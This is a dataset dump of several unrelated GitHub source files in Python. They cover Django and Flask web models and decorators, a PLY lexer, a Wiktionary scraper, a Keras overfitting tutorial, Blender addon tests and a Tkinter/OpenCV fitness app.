post_image = models.JSONField(encoder=None)\n\n class Meta:\n ordering = ['id']\n\n\nclass Comment(models.Model):\n author = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n post = models.ForeignKey(Post, on_delete=models.CASCADE)\n comment = models.TextField()\n time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['id']\n\n def __str__(self):\n return self.comment\n\n\nclass PostLike(models.Model):\n post = models.ForeignKey(Post, on_delete=models.CASCADE)\n liked_by = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n\n class Meta:\n ordering = ['id']\n\n\nclass CommentLike(models.Model):\n comment = models.ForeignKey(Comment, on_delete=models.CASCADE)\n liked_by = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n\n class Meta:\n ordering = ['id']\n\n\nclass SavedPost(models.Model):\n post = models.ForeignKey(Post, on_delete=models.CASCADE)\n saved_by = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n\n class Meta:\n ordering = ['id']\n","repo_name":"qoudri4re/clonestagram","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41022284001","text":"# PL { doc {} , aulas { { f1,f2,f3} } }\n# PL { doc {} , aulas { { f1,f2,f3} } }\n\nimport ply.lex as lex\n\ntokens = ['CHAV_ABRIR','CHAV_FECHAR','VIRG','NAME']\n\nt_CHAV_ABRIR = r'{'\nt_CHAV_FECHAR = r'}'\nt_VIRG = r','\nt_NAME = r'[a-zA-Z0-9\\-]+'\n\n\nt_ignore = \" \\t\\n\"\n\ndef t_error(t):\n print('Caráter ilegal: ', t.value[0])\n t.lexer.skip(1)\n\nlexer = 
lex.lex()\n\n","repo_name":"rushmetra/PL-Exercises","sub_path":"Aula08/exercicio2_lex.py","file_name":"exercicio2_lex.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7675247222","text":"# Import libraries\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport codecs\nimport mysql.connector as MySQL\nmysql = MySQL.connect(host='localhost',\n database='ar_nlg'\n , user='root'\n , password='')\nmycursor = mysql.cursor(dictionary=True)\n\n\n\ndef insertAdjectiveRoot(adjective):\n insert_query=(\"INSERT INTO `adjectives_root`( `adjective_root`) VALUES (%(adjective)s)\")\n insert_data = {\n 'adjective': adjective,\n }\n mycursor.execute(insert_query,insert_data)\n mysql.commit()\n return\n\n\nfrist_adj=\"آت\"\nfor i in range(10):#range(44):\n url='https://en.wiktionary.org/w/index.php?title=Category:Arabic_adjectives&pagefrom='+frist_adj\n\n # Connect to the URL\n response = requests.get(url)\n response.encoding = \"utf-8\"\n adjectives=[]\n\n # Parse HTML and save to BeautifulSoup object¶\n soup = BeautifulSoup(response.text, \"html.parser\")\n div= soup.find('div', attrs={'id':'mw-pages'})\n\n\n try:\n for ul in div.findAll('ul'):\n for li in ul.findAll('li'):\n a=li.find('a')\n adjectives.append(a.text.strip())\n frist_adj=a.text.strip()\n insertAdjectiveRoot(frist_adj)\n\n except Exception as e:\n continue\n\n print(frist_adj)\n","repo_name":"WaelMohammedAbed/Natural-Language-Generation-for-the-Arabic-Language","sub_path":"data_parsing_code/scrap_wiki_adj_roots.py","file_name":"scrap_wiki_adj_roots.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"74894964725","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 17 21:30:20 2018\n\n@author: LIKS\n\n模块功能:\n-将所有字词的向量保存到.npy便于用numpy计算\n-将所有字词Series,便于后面将训练数据数字化为整数1,2,3...的形式\n-处理特殊字符如 PAD填充符 UNK罕见字符\n\n该功能模块编程技巧不高,只需对各个类库熟悉\n\"\"\"\nimport word2vec\nimport os\nimport pandas as pd\nimport numpy as np\nimport pickle\n\nSPECIAL_SYMBOL=['','']\nn_special_sym=len(SPECIAL_SYMBOL)\nembedding_size=256\n\n\ndef get_word_embedding():\n print('start to load word2vec...')\n wv=word2vec.load('../raw_data/word_embedding.txt')\n word_embedding=wv.vectors\n words=wv.vocab\n \n #用Series存放word\n sr_id2word=pd.Series(words,index=range(n_special_sym,n_special_sym+len(words)))\n sr_word2id=pd.Series(range(n_special_sym,n_special_sym+len(words)),index=words)\n \n \n #Series中加入特殊字符\n for i in range(n_special_sym):\n sr_id2word[i]=SPECIAL_SYMBOL[i]\n sr_word2id[SPECIAL_SYMBOL[i]]=i\n \n #加入特殊字符的向量\n vec_special_sym=np.random.randn(n_special_sym,embedding_size)\n word_embedding=np.vstack((vec_special_sym,word_embedding))\n \n #保存词向量\n save_path='../data/'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n np.save(save_path+'word_embedding.npy',word_embedding)\n #dump几次后面就要load几次\n with open(save_path+'sr_word2id.pkl','wb') as outp:\n pickle.dump(sr_id2word,outp,True)\n pickle.dump(sr_word2id,outp,True)\n print('word_embdding.npy saved... 
sr_word2id pickled...')\n \ndef get_char_embedding():\n print('getting the char embeddings...')\n wv=word2vec.load('../raw_data/char_embedding.txt')\n char_embedding=wv.vectors\n chars=wv.vocab\n \n sr_id2char=pd.Series(chars, index=range(n_special_sym, n_special_sym+len(chars)))\n sr_char2id=pd.Series(range(n_special_sym, n_special_sym+len(chars)),index=chars)\n \n for i in range(n_special_sym):\n sr_id2char[i]=SPECIAL_SYMBOL[i]\n sr_char2id[SPECIAL_SYMBOL[i]]=i\n \n vec_special_sym=np.random.randn(n_special_sym,embedding_size)\n char_embedding=np.vstack((vec_special_sym,char_embedding))\n \n #保存字向量\n save_path='../data/'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n np.save(save_path+'char_embedding.npy',char_embedding)\n \n with open(save_path+'sr_char2id.pkl','wb') as outp:\n pickle.dump(sr_id2char,outp,True)\n pickle.dump(sr_char2id,outp,True)\n print('char_embdding.npy saved... sr_char2id pickled...')\n \nif __name__=='__main__':\n get_word_embedding()\n get_char_embedding()","repo_name":"FinIoT/zhihu_text_classification","sub_path":"embed2ndarray.py","file_name":"embed2ndarray.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24396631472","text":"\"\"\"Base Model Implemenation.\"\"\"\n\nfrom collections import OrderedDict\n\nfrom .exceptions import ObjectDoesNotExist\nfrom .fields import Field, Serial\nfrom .fieldslist import FieldsList, exclude\nfrom .managers import ModelManager\nfrom .storage import Storage\nfrom ..utils.comboprops import comboproperty\n\n\nclass ModelMeta:\n \"\"\"Model Descriptor Class.\"\"\"\n\n def __init__(self, model):\n \"\"\"Setup Descriptor.\"\"\"\n self.model = model\n self.name = model.__name__\n self.storagename = self.name.lower()\n self.pk = 'id'\n self.storages = []\n self.fields = OrderedDict()\n self.constraints = {\n 'unique': (),\n 'index': (),\n }\n # instance db state: 0 - unsaved; 1 - saved;\n self.db_state = 0\n\n\nclass ModelMetaBase(type):\n \"\"\"Model Meta Class.\"\"\"\n\n @classmethod\n def __prepare__(cls, name, bases, **kwargs):\n \"\"\"Make a namespace dict Orderd.\"\"\"\n return OrderedDict()\n\n def __new__(cls, name, bases, nmspc, **kwargs):\n \"\"\"Override model class creation.\"\"\"\n parents = [b for b in bases if isinstance(b, ModelMetaBase)]\n if not parents:\n return type.__new__(cls, name, bases, nmspc)\n\n module = nmspc.pop('__module__')\n model = type.__new__(cls, name, bases, {'__module__': module})\n\n _meta = nmspc.pop('Meta', None)\n\n meta = ModelMeta(model)\n meta.storagename = getattr(_meta, 'storagename', meta.storagename)\n meta.constraints['unique'] = getattr(_meta, 'unique', ())\n meta.constraints['index'] = getattr(_meta, 'index', ())\n\n # set serial field\n meta.fields[meta.pk] = Serial()\n meta.fields[meta.pk].name = meta.pk\n # parse declared fields\n for n, attr in nmspc.items():\n # handle declared fields\n if isinstance(attr, Field):\n attr.name = n\n meta.fields[n] = attr\n\n # set the rest declared attributes as is\n else:\n setattr(model, n, attr)\n\n # define model storage\n storage = Storage(meta.storagename, meta.fields, meta.constraints)\n meta.storages.append(storage)\n\n # set model fields as pointers to storage fields (columns)\n for n, f in meta.fields.items():\n setattr(model, n, storage.c[n])\n\n model._meta = meta\n model.list = ModelManager(model)\n model.DoesNotExist = type('DoesNotExist',\n (ObjectDoesNotExist,),\n {'__module__': module})\n\n return model\n\n def 
__repr__(self):\n \"\"\"Override representation.\"\"\"\n return u'' % self.__name__\n\n\nclass Model(metaclass=ModelMetaBase):\n \"\"\"Base Model.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Fill the model fields with supplied data.\"\"\"\n self.__fill(**kwargs)\n\n # @property\n # def pk(self):\n # return getattr(self, self._meta.pk)\n\n @comboproperty\n def pk(self):\n \"\"\"Primary key wrapper.\"\"\"\n return getattr(self, self._meta.pk)\n\n @pk.classproperty\n def pk(self):\n \"\"\"Primary key wrapper.\"\"\"\n return getattr(self, self._meta.pk)\n\n @classmethod\n def from_db(cls, **kwargs):\n \"\"\"Init model with data loaded from the db.\"\"\"\n instance = cls(**kwargs)\n instance._meta.db_state = 1\n return instance\n\n def __fill(self, **kwargs):\n for n, v in self._meta.fields.items():\n val = kwargs.pop(n, v.default)\n if hasattr(val, '__call__'):\n val = val()\n\n setattr(self, n, val)\n\n # set the rest object attributes\n for n, v in kwargs.items():\n setattr(self, n, v)\n\n async def to_dict(self, *fields, **options):\n \"\"\"Prepare python dict representation of the model instance.\n\n Usage:\n to_dict(field_name1, field_name2,\n exclude(field_name3),\n custom(custom_field_name=method_or_property_name)\n )\n\n means that we want to build a dict with a field field_name1,\n field_name2 and custom_field_name excluding field_name3.\n wherein custom_file_name will actully point to another field or\n method of the model.\n\n \"\"\"\n fl = options.pop('fieldslist', FieldsList()).append(*fields)\n result = {fld: value for fld, value in self if fld in fl}\n # handle custom fields\n for alias, fpath in fl.custom:\n obj = self\n for fld in fpath:\n obj = getattr(obj, fld, None)\n\n value = obj() if hasattr(obj, '__call__') else obj\n # if not is_protected_type(value):\n # if hasattr(value, 'to_dict'):\n # value = value.to_dict(**self._options)\n # else:\n # value = str(value)\n result[fld] = value\n\n # handle related fields\n for fld, sfl in fl.related.items():\n result[fld] = getattr(self, fld).to_dict(fields_list=sfl)\n\n return result\n\n async def save(self, db):\n \"\"\"Save model instance to the database.\"\"\"\n if self.pk and self._meta.db_state == 1:\n # update previosly saved object record\n data = await self.to_dict(exclude(type(self)._meta.pk))\n r = await self.list(db).filter(\n type(self).pk == self.pk).update(**data)\n else:\n # insert new object record\n r = await self.list(db).insert(**dict(self))\n self._meta.db_state = 1\n\n self.__fill(**r)\n\n async def delete(self, db):\n \"\"\"Delete model instance from the database.\"\"\"\n if self.pk and self._meta.db_state == 1:\n await self.list(db).delete(type(self).pk == self.pk)\n # reset instance primary key to None\n setattr(self, type(self)._meta.pk, None)\n\n def __iter__(self):\n \"\"\"Override model iterator.\n\n It should yield model field name and it's value as a tupel.\n \"\"\"\n for n in self._meta.fields.keys():\n yield (n, getattr(self, n, None))\n\n def __repr__(self):\n \"\"\"Represenation.\"\"\"\n return u'<%s : %s>' % (self._meta.name, self.pk)\n","repo_name":"RTyy/aiocomments","sub_path":"source/core/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3371825572","text":"class yrange:\n def __init__(self,*args):\n if len(args)>3 or len(args)==0:\n raise Exception\n if len(args) == 2:\n self.start = args[0]\n self.end = args[1]\n else :\n self.start = 0\n self.end 
=args[0]\n def __iter__(self):\n return self\n def __next__(self):\n if self.start < self.end:\n res = self.start\n self.start +=1\n return res\n else:\n return StopIteration\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"redliu312/py_learning","sub_path":"learn_iter/learn_it.py","file_name":"learn_it.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7397550448","text":"import json\n\nfrom flask import request, session\n\nfrom portfolio.internal.biz.services.account_role import AccountRoleService\nfrom portfolio.internal.biz.services.auth_service import AuthService\nfrom portfolio.models.account_role import AccountRole\nfrom portfolio.models.account_session import AccountSession\n\n\ndef check_account_role(func):\n def wrapper(*args, **kwargs):\n if request.method == 'POST':\n if not request.form.get('role_id'):\n return json.dumps(\"Выберите роль\")\n account_role = AccountRole(id=request.form.get('role_id'))\n account_role, err = AccountRoleService.get_name_by_id(account_role)\n if err:\n return json.dumps(err)\n response = func(*args, account_role_id=account_role.id, **kwargs)\n return response\n elif request.method == 'GET':\n list_account_role, err = AccountRoleService.get_all()\n if err:\n return json.dumps(err)\n\n response = func(*args, list_account_role=list_account_role, **kwargs)\n return response\n\n wrapper.__name__ = func.__name__\n return wrapper\n\n\ndef check_account_role_organisation_and_login_required(func):\n def wrapper(*args, **kwargs):\n if not session.get('auth-token'):\n return \"Где токен?\"\n\n session_id = AccountSession.get_session_id_from_token(session.get('auth-token'))\n if not session_id:\n return \"Невалидный или недействительный токен\"\n\n account_main, err = AuthService.get_account_main_by_session_id_with_confirmed(session_id)\n if err:\n return \"HZ\"\n\n if not account_main:\n return \"Невалидный или недействительный токен\"\n\n if not account_main.is_confirmed:\n return \"Пожалуйста, подтвердите email\"\n\n account_role_id = AccountRole.get_account_role_from_token(session.get('auth-token'))\n\n if not account_role_id:\n return \"Невалидный или устаревший токен\"\n\n if account_role_id != 1:\n return \"Недостаточно прав\"\n response = func(*args, *kwargs)\n return response\n wrapper.__name__ = func.__name__\n return wrapper\n\n\ndef check_account_role_parents_and_login_required(func):\n def wrapper(*args, **kwargs):\n if not session.get('auth-token'):\n return \"Где токен?\"\n\n session_id = AccountSession.get_session_id_from_token(session.get('auth-token'))\n if not session_id:\n return \"Невалидный или недействительный токен\"\n\n account_main, err = AuthService.get_account_main_by_session_id_with_confirmed(session_id)\n if err:\n return \"HZ\"\n\n if not account_main:\n return \"Невалидный или недействительный токен\"\n\n if not account_main.is_confirmed:\n return \"Пожалуйста, подтвердите email\"\n\n account_role_id = AccountRole.get_account_role_from_token(session.get('auth-token'))\n\n if not account_role_id:\n return \"Невалидный или устаревший токен\"\n\n if account_role_id != 2:\n return \"Недостаточно прав\"\n\n response = func(*args, auth_account_main_id=account_main.id, **kwargs)\n return response\n wrapper.__name__ = func.__name__\n return 
wrapper\n","repo_name":"kirillpechurin/digital_skills","sub_path":"portfolio/internal/http/wrappers/account_role.py","file_name":"account_role.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1248051674","text":"# -*- coding: UTF-8 -*-\n# 使用 regularization and dropout 來改進 IMDB movie review\n\nfrom __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nNUM_WORDS = 10000\n\n(train_data, train_labels), (test_data, test_labels) = keras.datasets.imdb.load_data(num_words=NUM_WORDS)\n\ndef multi_hot_sequences(sequences, dimension):\n # Create an all-zero matrix of shape (len(sequences), dimension)\n results = np.zeros((len(sequences), dimension))\n for i, word_indices in enumerate(sequences):\n results[i, word_indices] = 1.0 # set specific indices of results[i] to 1s\n return results\n\n\ntrain_data = multi_hot_sequences(train_data, dimension=NUM_WORDS)\ntest_data = multi_hot_sequences(test_data, dimension=NUM_WORDS)\n\nplt.plot(train_data[0])\nplt.show()\n\n# Demonstrate overfitting\n## Create a baseline model\nbaseline_model = keras.Sequential([\n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(16, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\nbaseline_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy', 'binary_crossentropy'])\n\nbaseline_model.summary()\n\nbaseline_history = baseline_model.fit(train_data,\n train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n\n## Create a smaller model\nsmaller_model = keras.Sequential([\n keras.layers.Dense(4, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(4, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\nsmaller_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy', 'binary_crossentropy'])\n\nsmaller_model.summary()\n\nsmaller_history = smaller_model.fit(train_data,\n train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n\n## Create a bigger model\nbigger_model = keras.models.Sequential([\n keras.layers.Dense(512, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(512, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\nbigger_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy','binary_crossentropy'])\n\nbigger_model.summary()\nbigger_history = bigger_model.fit(train_data, train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n\n## 畫圖比較三個 model 的表現\ndef plot_history(histories, key='binary_crossentropy'):\n plt.figure(figsize=(16,10))\n \n for name, history in histories:\n val = plt.plot(history.epoch, history.history['val_'+key],\n '--', label=name.title()+' Val')\n plt.plot(history.epoch, history.history[key], color=val[0].get_color(),\n label=name.title()+' Train')\n plt.xlabel('Epochs')\n plt.ylabel(key.replace('_',' ').title())\n plt.legend()\n plt.xlim([0,max(history.epoch)])\n\nplot_history([('baseline', baseline_history),\n ('smaller', smaller_history),\n ('bigger', bigger_history)])\nplt.show()\n# 發現越大的網路,建模的速度越快,但是也越容易 over-fitting\n\n\n## 加入權重試試看\nl2_model = keras.models.Sequential([\n 
keras.layers.Dense(16, kernel_regularizer=keras.regularizers.l2(0.001),\n activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(16, kernel_regularizer=keras.regularizers.l2(0.001),\n activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\nl2_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy', 'binary_crossentropy'])\n\nl2_model_history = l2_model.fit(train_data, train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n\n# 畫圖跟原本的比較,會發現效果很好\nplot_history([('baseline', baseline_history),\n ('l2', l2_model_history)])\nplt.show()\n\n## 加入 dropout\n# dropout 是在訓練期間 layer 隨機 dropout (設為 0) feature 的 output.\n# 通常設定在 0.2 ~ 0.5 之間\ndpt_model = keras.models.Sequential([\n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(16, activation=tf.nn.relu),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\ndpt_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy','binary_crossentropy'])\n\ndpt_model_history = dpt_model.fit(train_data, train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n# 畫圖跟原本的比較,會發現效果很好\nplot_history([('baseline', baseline_history),\n ('dropout', dpt_model_history)])\nplt.show()\n","repo_name":"bird1204/TFPractice","sub_path":"TensorFlow/Learn and use ML/05_OverFitting_and_underfitting.py","file_name":"05_OverFitting_and_underfitting.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70344358005","text":"from src.model.model import BaseModel\n\n\nclass Goods(BaseModel):\n def __init__(self, goods_id=-1, owner_id=-1, name='', price=-1, condition='', bargain=None):\n super().__init__(\n id=goods_id,\n owner_id=owner_id,\n name=name,\n price=price,\n condition=condition,\n bargain=bargain\n )\n\n def __eq__(self, other):\n return (\n self.id == other.id and\n self.owner_id == other.owner_id and\n self.name == other.name and\n self.price == other.price and\n self.condition == other.condition and\n ((not self.bargain and other.bargain == 'null') or\n str(self.bargain).lower() == str(other.bargain).lower())\n )\n\n","repo_name":"ilyasssklimov/bmstu_CourseProjectDB","sub_path":"src/model/goods.py","file_name":"goods.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19336176497","text":"from asset_browser_utilities.core.test.prop import TestOperator\nfrom asset_browser_utilities.module.asset.test.tool import assert_that_id_is_an_asset, assert_that_id_is_not_an_asset\nimport bpy\n\nfrom asset_browser_utilities.core.filter.type import get_object_types, get_types\nfrom asset_browser_utilities.module.asset.operator.mark import AssetMarkBatchExecute\n\nfrom asset_browser_utilities.module.asset.tool import all_assets_container_and_name\n\n\ndef test_marking_all_assets_in_current_file(filepath):\n test_op = TestOperator(\n filepath=filepath,\n filter_assets=False,\n logic_class=AssetMarkBatchExecute,\n )\n\n test_op.op_props.generate_previews = False\n\n test_op.execute()\n\n supported_asset_types = [a_t[0] for a_t in get_types()]\n for d in dir(bpy.data):\n container = getattr(bpy.data, d)\n if \"bpy_prop_collection\" in str(type(container)):\n if d in supported_asset_types:\n for asset in 
container:\n assert_that_id_is_an_asset(asset)\n else:\n for asset in container:\n assert_that_id_is_not_an_asset(asset)\n\n\ndef test_marking_different_asset_types_in_current_file(filepath):\n for asset_type_tuple in get_types():\n asset_type = asset_type_tuple[0]\n test_op = TestOperator(\n filepath=filepath,\n filter_assets=False,\n filter_types={asset_type},\n filter_object_types=False,\n logic_class=AssetMarkBatchExecute,\n )\n assets_start = all_assets_container_and_name()\n\n test_op.op_props.generate_previews = False\n\n test_op.execute()\n\n for d in dir(bpy.data):\n container = getattr(bpy.data, d)\n if \"bpy_prop_collection\" in str(type(container)):\n if d == asset_type:\n for asset in container:\n if (d, asset.name) in assets_start:\n continue\n assert_that_id_is_an_asset(asset)\n else:\n for asset in container:\n if (d, asset.name) in assets_start:\n continue\n assert_that_id_is_not_an_asset(asset)\n\n\ndef test_marking_different_object_types_in_current_file(filepath):\n for object_type_tuple in get_object_types():\n object_type = object_type_tuple[0]\n test_op = TestOperator(\n filepath=filepath,\n filter_assets=False,\n filter_types={\"objects\"},\n filter_object_types={object_type},\n logic_class=AssetMarkBatchExecute,\n )\n assets_start = all_assets_container_and_name()\n\n test_op.op_props.generate_previews = False\n\n test_op.execute()\n\n for obj in bpy.data.objects:\n if (\"objects\", obj.name) in assets_start:\n continue\n elif obj.type == object_type:\n assert_that_id_is_an_asset(obj)\n else:\n assert_that_id_is_not_an_asset(obj)\n","repo_name":"Gorgious56/asset_browser_utilities","sub_path":"module/asset/test/mark.py","file_name":"mark.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"76"} +{"seq_id":"43469234426","text":"from django import template\nfrom django.utils.safestring import mark_safe\nfrom taggit.models import Tag\nfrom blog.models import Post\n\nimport markdown\n\nregister = template.Library()\n\n@register.simple_tag\ndef total_posts():\n return Post.published.count()\n\n@ register.inclusion_tag('latest_posts.html')\ndef show_latest_posts(count=5):\n latest_posts = Post.published.order_by('-publish')[:count]\n return {'latest_posts': latest_posts}\n\n@register.inclusion_tag('tag_list.html')\ndef show_all_tags():\n tag_list = Tag.objects.all()\n return {'tag_list': tag_list}\n\n@register.filter(name='markdown')\ndef markdown_format(text):\n return mark_safe(markdown.markdown(\n text,\n extensions=['extra','codehilite',],\n extension_configs={\n 'codehilite': [('css_class', 'highlight')]\n },\n output_format='html5'\n ))\n","repo_name":"ChiZhang9797/blog-app","sub_path":"blog/templatetags/blog_tags.py","file_name":"blog_tags.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14147693809","text":"from PIL import ImageTk as ImgTk\r\nfrom tkinter import *\r\nimport webbrowser\r\nimport threading\r\nimport cv2\r\n\r\n\r\ndef runExerciseDetection():\r\n cap = cv2.VideoCapture(0)\r\n\r\n while True:\r\n img = cap.read()[1]\r\n cv2.imshow(\"VizFit Exercise - Webcam\", img)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n if cv2.getWindowProperty(\"VizFit Exercise - Webcam\", cv2.WND_PROP_VISIBLE) < 1:\r\n break\r\n\r\n cv2.destroyAllWindows()\r\n cap.release()\r\n\r\ndef startThread():\r\n thread1 = threading.Thread(target=runExerciseDetection)\r\n 
thread1.start()\r\n root.withdraw()\r\n\r\n while True:\r\n if thread1.is_alive():\r\n doNothing = 0\r\n else:\r\n root.deiconify()\r\n for widget in root.winfo_children():\r\n widget.destroy()\r\n break\r\n\r\n showResults()\r\n \r\n\r\ndef openToSite():\r\n webbrowser.open(\"https://mackey.cs.uafs.edu/\")\r\n\r\n\r\ndef showHome():\r\n def showLogin():\r\n def toWelcomefromHome():\r\n top.destroy()\r\n root.deiconify()\r\n\r\n logoLabel.destroy()\r\n loginButton.destroy()\r\n registerButton.destroy()\r\n instructions.destroy()\r\n filler.destroy()\r\n\r\n showWelcome()\r\n \r\n def closeLogin():\r\n top.destroy()\r\n root.deiconify()\r\n\r\n # Hide Home Page #\r\n root.withdraw()\r\n\r\n top = Toplevel()\r\n top.title(\"VizFit - Login\")\r\n top.config(bg=\"#434343\")\r\n top.resizable(False, False) \r\n topCanvas = Canvas(top, width=400, height=100, bg=\"#434343\", highlightthickness=0)\r\n topCanvas.grid(columnspan=3)\r\n\r\n\r\n # User Label & Entry #\r\n usernameLabel = Label(top, text=\"User:\", font=(\"Arial\",15), fg=\"#FFFFFF\", bg=\"#434343\", anchor=\"w\")\r\n usernameLabel.grid(columnspan=2, column=0, row=0, padx=0)\r\n\r\n username = Entry(top, width=30)\r\n username.grid(columnspan=2, column=1, row=0, padx=(0,20), pady=0)\r\n\r\n\r\n # Password Label & Entry #\r\n passwordLabel = Label(top, text=\"Password:\", font=(\"Arial\",15), fg=\"#FFFFFF\", bg=\"#434343\", anchor=\"w\")\r\n passwordLabel.grid(columnspan=2, column=0, row=1, padx=(0,50), pady=(0,30))\r\n\r\n password = Entry(top, width=30)\r\n password.grid(columnspan=2, column=1, row=1, padx=(0,20), pady=(0,30))\r\n\r\n\r\n # Submit Button #\r\n submitButton = Button(top, text=\"Submit\", font=\"Arial\", width=12, bg=\"#6aa84f\", command=toWelcomefromHome)\r\n submitButton.grid(columnspan=3, column=0, row=2, pady=(0,15))\r\n \r\n\r\n top.protocol(\"WM_DELETE_WINDOW\", closeLogin)\r\n\r\n\r\n # Logo Label #\r\n logo = ImgTk.PhotoImage(file = 'logo4.png')\r\n logoLabel = Label(image=logo)\r\n logoLabel.image = logo\r\n logoLabel.config(border=False)\r\n logoLabel.grid(columnspan=3, column=0, row=0, pady=(0,0))\r\n\r\n\r\n # Login Button #\r\n loginButton = Button(root, text=\"Login\", font=\"Arial\", height=3, width=12, bg=\"#6aa84f\",command=showLogin)\r\n loginButton.grid(columnspan=2, column=0, row=1, pady=(0,30))\r\n\r\n\r\n # Register Button #\r\n registerButton = Button(root, text=\"Register\", font=\"Arial\", height=3, width=12, bg=\"#6aa84f\", command=openToSite)\r\n registerButton.grid(columnspan=2, column=1, row=1, pady=(0,30))\r\n\r\n\r\n # Instructions Label #\r\n instructions = Label(root, text=\"Please login. Don't have a account? 
Register!\", font=(\"Arial\",20), fg=\"#FFFFFF\", bg=\"#434343\")\r\n instructions.grid(columnspan=3, column=0, row=3)\r\n\r\n \r\n # Filler Space #\r\n filler = Label(root, text=\"!!!!!!!!!!!!!!!!!!!!!!!!!\", font=\"Arial\", fg=\"#434343\", bg=\"#434343\")\r\n filler.grid(columnspan=3, column=0, row=4)\r\n\r\n\r\ndef showWelcome():\r\n def toHomefromWelcome():\r\n logoLabel.destroy()\r\n welcome.destroy()\r\n beginButton.destroy()\r\n logoutButton.destroy()\r\n filler.destroy()\r\n\r\n showHome()\r\n\r\n # Logo Label #\r\n logo = ImgTk.PhotoImage(file = 'logo4.png')\r\n logoLabel = Label(image=logo)\r\n logoLabel.image = logo\r\n logoLabel.config(border=False)\r\n logoLabel.grid(columnspan=3, column=0, row=0, pady=(0,0))\r\n\r\n \r\n # Welcome Label #\r\n welcome = Label(root, text=\"Welcome back, [Insert Name]!\", font=(\"Arial\",20), fg=\"#FFFFFF\", bg=\"#434343\")\r\n welcome.grid(columnspan=3, column=0, row=1, pady=(0,30))\r\n\r\n\r\n # Begin Exercise Button #\r\n beginButton = Button(root, text=\"Begin Exercising\", font=\"Arial\", height=3, width=16, bg=\"#6aa84f\",command=startThread)\r\n beginButton.grid(column=1, row=2, pady=(15,30))\r\n\r\n\r\n # Logout Button #\r\n logoutButton = Button(root, text=\"Logout\", font=\"Arial\", height=2, width=8, bg=\"#6aa84f\", command=toHomefromWelcome)\r\n logoutButton.grid(column=1, row=3, pady=(0,30))\r\n\r\n \r\n # Filler Space #\r\n filler = Label(root, text=\"!!!!!!!!!!!!!!!!!!!!!!!!!\", font=\"Arial\", fg=\"#434343\", bg=\"#434343\")\r\n filler.grid(columnspan=3, column=0, row=4)\r\n\r\n\r\ndef showResults():\r\n def toHomefromResults():\r\n logoLabel.destroy()\r\n output1.destroy()\r\n filler1.destroy()\r\n output2.destroy()\r\n squatsLabel.destroy()\r\n pushUpLabel.destroy()\r\n 